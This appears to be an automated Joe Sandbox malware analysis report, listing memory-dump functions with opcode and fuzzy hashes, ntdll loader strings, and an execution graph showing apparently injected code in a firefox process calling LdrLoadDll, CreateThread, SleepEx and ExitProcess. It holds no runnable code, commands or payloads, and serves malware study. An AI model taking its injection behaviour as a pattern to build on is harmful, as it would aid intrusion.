                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID: InitializeThunk
                                                                                          • String ID:
                                                                                          • API String ID: 2994545307-0
                                                                                          • Opcode ID: 069e1814bd6df6fb828663c426946397eaa6b883290aa33a2427b78bbe967ec2
                                                                                          • Instruction ID: 0bff7645d47ef5440ef3389d6f461b86208f82dff9b7f9addaa5729c544dbe74
                                                                                          • Opcode Fuzzy Hash: 069e1814bd6df6fb828663c426946397eaa6b883290aa33a2427b78bbe967ec2
                                                                                          • Instruction Fuzzy Hash: B1B09B72D015C5C5FB11EF60570C7177900ABD1745F15C455D1460685E473CD491F175

                                                                                          Non-executed Functions

                                                                                          Function 049F7550 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          • Execute=1, xrefs: 04A3451E
                                                                                          • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 04A3454D
                                                                                          • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 04A34460
                                                                                          • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 04A34507
                                                                                          • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 04A34530
                                                                                          • ExecuteOptions, xrefs: 04A344AB
                                                                                          • CLIENT(ntdll): Processing section info %ws..., xrefs: 04A34592
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                          • API String ID: 0-484625025
                                                                                          • Opcode ID: f58a3aa10969172673c8f07d0ed0fec74ac5ed34b059e33393ee791e09b1002f
                                                                                          • Instruction ID: 901b106901640e13fa15b9f08f98293fcb1e5a6bbf626a6cb6a5b486453a225d
                                                                                          • Opcode Fuzzy Hash: f58a3aa10969172673c8f07d0ed0fec74ac5ed34b059e33393ee791e09b1002f
                                                                                          • Instruction Fuzzy Hash: 8851D431A002196AEF10AFE4ED95FAE73ADEF48714F0404F9E605A7181E670BE45CF61
                                                                                          Function 049C9046 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 199COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000D.00000002.5166777950.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004AB9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 0000000D.00000002.5166777950.0000000004ABD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_13_2_4990000_cttune.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: $$@
                                                                                          • API String ID: 0-1194432280
                                                                                          • Opcode ID: 4b2042a707ae4d8f7e242ccd942b9c46218b2acbe0da1bfcd46ca90e5ee5b4cc
                                                                                          • Instruction ID: 1dce0ea6835ddeae8939b1ff7f2f1634d9fa0b78dda7d743941e2d284e28ee5c
                                                                                          • Opcode Fuzzy Hash: 4b2042a707ae4d8f7e242ccd942b9c46218b2acbe0da1bfcd46ca90e5ee5b4cc
                                                                                          • Instruction Fuzzy Hash: 7D814CB2D002699BDB35CF54CD44BEEB6B8AF48714F0041EAE909B7250E7706E85DFA1

                                                                                          Execution Graph

                                                                                          Execution Coverage:4.8%
                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                          Signature Coverage:0%
                                                                                          Total number of Nodes:26
                                                                                          Total number of Limit Nodes:5
                                                                                          execution_graph 4972 20832dea8c2 4974 20832dea8f0 4972->4974 4973 20832dea8f4 4974->4973 4975 20832dea930 LdrLoadDll 4974->4975 4976 20832dea94c 4974->4976 4975->4976 4995 20832de07f3 4996 20832de07ff 4995->4996 4997 20832de075e 4996->4997 4998 20832de08e7 CreateThread 4996->4998 4977 20832de149a 4980 20832de14c4 4977->4980 4978 20832de1555 4979 20832de14eb SleepEx 4979->4980 4980->4978 4980->4979 4991 20832de07da 4992 20832de07ff 4991->4992 4993 20832de075e 4991->4993 4992->4993 4994 20832de08e7 CreateThread 4992->4994 4981 20832dece29 4983 20832dece31 4981->4983 4982 20832decdd8 4983->4982 4985 20832decf24 4983->4985 4987 20832de0868 4983->4987 4985->4982 4986 20832decf92 ExitProcess 4985->4986 4989 20832de0892 4987->4989 4988 20832de0915 4988->4985 4989->4988 4990 20832de08e7 CreateThread 4989->4990 4990->4985

                                                                                          Executed Functions

                                                                                          Function 0000020832DE07DA Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3de86df0c232387e30d1db65e29c7229b3631d6909cb3c478aa5e7e9bffa56a
                                                                                          • Instruction ID: 924c3ae20b51750f2f01e5590e1d970edb085f1c5469464e73e41aac406edf65
                                                                                          • Opcode Fuzzy Hash: f3de86df0c232387e30d1db65e29c7229b3631d6909cb3c478aa5e7e9bffa56a
                                                                                          • Instruction Fuzzy Hash: FC41793210C7C88FEB54AF24E48939AB7D1FBC5314F1006ADD8899B193DB329486CBC2
                                                                                          Function 0000020832DECE29 Relevance: 1.6, APIs: 1, Instructions: 127COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 1aede41d797fe813dcfebefb20e749ba77e2e2780ac3cba8b4b74dc5412fe882
                                                                                          • Instruction ID: eda7891f1eeac533d1d7a1a2eb6d59e059bb3ac7111577e1a591789d9768f504
                                                                                          • Opcode Fuzzy Hash: 1aede41d797fe813dcfebefb20e749ba77e2e2780ac3cba8b4b74dc5412fe882
                                                                                          • Instruction Fuzzy Hash: 88418C30614BCD8EEBA4BB64848D3AF76D0FBC4B01F8089A9989DC61C7DF3498458793
                                                                                          Function 0000020832DE085A Relevance: 1.6, APIs: 1, Instructions: 98threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: aa571ec086e762fe205dcd79daa092c09d8b44df147168f93f65d46a496a63ed
                                                                                          • Instruction ID: d7aa0a084b78830f39b81706b69f4fff966d72646137cc2a6a6989aa58547303
                                                                                          • Opcode Fuzzy Hash: aa571ec086e762fe205dcd79daa092c09d8b44df147168f93f65d46a496a63ed
                                                                                          • Instruction Fuzzy Hash: 9431F13110C7888FEB44AF24E489396B7E1FB94314F0006ADE489CB293DB759446C7C6
                                                                                          Function 0000020832DE149A Relevance: 1.6, APIs: 1, Instructions: 78COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: Sleep
                                                                                          • String ID:
                                                                                          • API String ID: 3472027048-0
                                                                                          • Opcode ID: 4e649abba15ea8110893023f09ea5d785b26aae84fb858c6c661c3a3d0b75d8e
                                                                                          • Instruction ID: 758200a47668c6150136556c20c5f2e554db380cebad448608b10c04052d3a52
                                                                                          • Opcode Fuzzy Hash: 4e649abba15ea8110893023f09ea5d785b26aae84fb858c6c661c3a3d0b75d8e
                                                                                          • Instruction Fuzzy Hash: 22215830614B5C4FEB54EB68849475EB7E1FB84F04F4405BAD59AC7283CE24CC418643
                                                                                          Function 0000020832DEA8C2 Relevance: 1.6, APIs: 1, Instructions: 57libraryloaderCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: Load
                                                                                          • String ID:
                                                                                          • API String ID: 2234796835-0
                                                                                          • Opcode ID: 67b800de07f373ada63f00b8a66a2eedb6b9540f5f36f14d8a57f2deefc0141c
                                                                                          • Instruction ID: 3f67cf4964503d9d9912df688bfc2d5d42551451a2b5b7a85f0bab8ee8503b90
                                                                                          • Opcode Fuzzy Hash: 67b800de07f373ada63f00b8a66a2eedb6b9540f5f36f14d8a57f2deefc0141c
                                                                                          • Instruction Fuzzy Hash: A701B530208B8D4BE754E724C8CD7AB77E4FFE8305F44057AA88EC6192EE35D6458643
                                                                                          Function 0000020832DE0868 Relevance: 1.6, APIs: 1, Instructions: 53threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 0000000E.00000002.1753053510.0000020832DA0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0000020832DA0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_14_2_20832da0000_firefox.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateThread
                                                                                          • String ID:
                                                                                          • API String ID: 2422867632-0
                                                                                          • Opcode ID: fd4c906c251671eb68816a7f7ff8aaad30e9e9ab6da0375cf5c758643b4c169f
                                                                                          • Instruction ID: 39633481c51617bc7c6aeacec8c21dca31c8d2ea55a325382711ad6f94bde98e
                                                                                          • Opcode Fuzzy Hash: fd4c906c251671eb68816a7f7ff8aaad30e9e9ab6da0375cf5c758643b4c169f
                                                                                          • Instruction Fuzzy Hash: AB117030114B898FFB44AF28C49D396B7D0FB98309F0506BD9459CB292DF7584868B86